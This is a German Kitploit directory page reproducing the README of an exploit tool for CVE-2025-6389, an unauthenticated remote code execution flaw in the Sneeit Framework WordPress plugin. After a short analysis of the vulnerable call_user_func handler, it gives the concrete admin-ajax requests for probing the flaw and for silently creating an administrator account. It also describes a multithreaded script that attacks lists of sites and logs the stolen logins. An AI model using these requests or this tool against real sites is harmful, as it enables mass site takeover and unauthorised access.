Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6389 — Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Codeausführung in sneeit_articles_pagination_callback | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-6389
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubnxploited/cve-2025-6389

CVE-2025-6389

Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Codeausführung in sneeit_articles_pagination_callback

Repository anzeigen
11vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-6389

Sneeit Framework <= 8.3 – Nicht authentifizierte Remote-Code-Ausführung in sneeit_articles_pagination_callback

    _______      ________    ___   ___ ___  _____         __ ____   ___   ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|       / /|___ \ / _ \ / _ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ / /_  __) | (_) | (_) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| '_ \|__ < > _ < \__, |
 | |____   \  /  | |____    / /_| |_| / /_ ___) |     | (_) |__) | (_) |  / / 
  \_____|   \/   |______|  |____|\___|/____|____/       \___/____/ \___/  /_/  

Telegram CVE CVSS Python License


📡 Verpassen Sie nicht den nächsten Drop. Folgen Sie @KNxploited auf Telegram – dem definitiven Kanal für frisch veröffentlichte CVEs, funktionierende Exploits und erstklassige Sicherheitsforschung. Der Erste, der es weiß. Der Erste, der handelt.


🧠 Übersicht

CVE-2025-6389 ist eine CVSS 9.8 kritische Remote-Code-Ausführungs-Schwachstelle im Sneeit Framework-Plugin für WordPress.

Der Fehler steckt in der Funktion sneeit_articles_pagination_callback(), die blind benutzergesteuerte Eingaben an PHP's call_user_func() übergibt – ein nicht authentifizierter Angreifer kann jede PHP-Funktion mit beliebigen Argumenten aufrufen, einschließlich wp_insert_user, und sich so effektiv vollständigen Administrationszugriff verschaffen oder beliebigen serverseitigen Code ausführen.

FeldDetails
CVE-IDCVE-2025-6389
PluginSneeit Framework (sneeit-framework)
Betroffene VersionenAlle Versionen bis einschließlich 8.3
SchwachstellentypRemote-Code-Ausführung (RCE)
AngriffsvektorNetzwerk – Keine Authentifizierung erforderlich
CVSS 3.1 Score9.8 KRITISCH
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
AuswirkungVollständige Server-Kompromittierung / Admin-Übernahme
ForscherNxploited

💀 Tiefergehende Schwachstellenanalyse

Die Ursache ist der Missbrauch von PHP's call_user_func() im AJAX-Handler des Plugins:

// Registriert ohne Authentifizierungsprüfung
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];  // ← Vom Benutzer gesteuerter Funktionsname
    $args     = json_decode(stripslashes($_POST['args']), true); // ← Vom Benutzer gesteuerte Argumente

    // Aufruf BELIEBIGER PHP-Funktion mit BELIEBIGEN Argumenten – keinerlei Validierung
    $result = call_user_func($callback, ...$args);

    echo $result;
    die();
}

Warum dies kritisch ist:

  • wp_ajax_nopriv_* = zugänglich für jeden, kein Login erforderlich
  • call_user_func($callback, $args) = beliebiger Funktionsaufruf
  • Angreifer kann var_dump, system, wp_insert_user, eval oder jede andere PHP/WordPress-Funktion aufrufen
  • Die Antwort wird direkt zurückgegeben – ermöglicht blinde & verbose RCE

⚔️ Exploit-Kette

Schritt 1 – Sondierung / Fingerabdruck
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Erwartete Antwort → array(1) { [0]=> string(4) "test" }
  ↓
Bestätigt: call_user_func() ist erreichbar und gibt Ausgabe zurück

──────────────────────────────────────────────────────────────────
Schritt 2 – Erstellung eines Administratorkontos
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX",
               "user_pass":"xplpass",
               "user_email":"...",
               "role":"administrator"}

Ergebnis → Neues Administratorkonto stillschweigend auf dem Ziel erstellt
  ↓
Vollständiger WordPress-Admin-Panel-Zugriff erreicht ✔️

⚙️ Anforderungen

pip install requests rich
AbhängigkeitZweck
requestsHTTP-Anfragen mit Sitzungs-/Proxy-Unterstützung
richLive-Terminal-Dashboard, Panels, Fortschritt
threadingGleichzeitige Mehrfachziel-Verarbeitung
queueThreadsichere Zielverteilung

Python 3.8+ erforderlich. Typannotationen verwenden die in 3.9+ eingeführte tuple[...]-Syntax – für beste Kompatibilität Python 3.9+ verwenden.


📂 Dateistruktur

CVE-2025-6389/
├── CVE-2025-6389.py          # Haupt-Exploit-Skript
├── list.txt                  # Ziel-URLs – eine pro Zeile
├── success_results.txt       # Automatisch generiert: erfolgreiche Ziele + Anmeldedaten
└── debug_responses/          # Automatisch generiert: rohe Serverantworten zum Debuggen
    └── <target>.resp.txt

🚀 Verwendung

Schritt 1 – Ziele vorbereiten

Erstellen Sie list.txt mit einer URL pro Zeile:

https://target1.com
https://target2.com
http://target3.com

URLs ohne http:// oder https:// werden automatisch mit http:// versehen.


Schritt 2 – Exploit ausführen

python CVE-2025-6389.py

Sie werden zur Eingabe aufgefordert:

Name der Zieldatei (Standard list.txt): list.txt
Anzahl der Threads (Standard 10):       20

Schritt 3 – Live-Dashboard

Das Skript startet ein Echtzeit-Rich-Dashboard mit:

┌─────────────────────────────────────────────────────────────────────┐
│  [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│  Info                        │  Statistiken                          │
│  Verwendung: Ziele in...    │  Gesamtziele:  150                 │
│  Threads: 20                 │  Verarbeitet:      87                  │
│  Passwort: xplpass           │  Erfolge:      12                  │
│  Erfolgsprotokoll: success... │  Fehlschläge:       75                  │
│  Debug-Verzeichnis: debug_responses  │  Verstrichene Zeit:        00:01:43            │
├──────────────────────────────┴──────────────────────────────────────┤
│  Aktuelle Ergebnisse                                                      │
│  Zeit     Ziel                              Ergebnis                 │
│  14:23:01 https://victim.com                  ERFOLG               │
│  14:23:03 https://example.net                 FEHLGESCHLAGEN                  │
└─────────────────────────────────────────────────────────────────────┘

Schritt 4 – Ergebnisse prüfen

Erfolgreiche Exploits werden in success_results.txt gespeichert:

https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: [email protected]
Tool herunterladen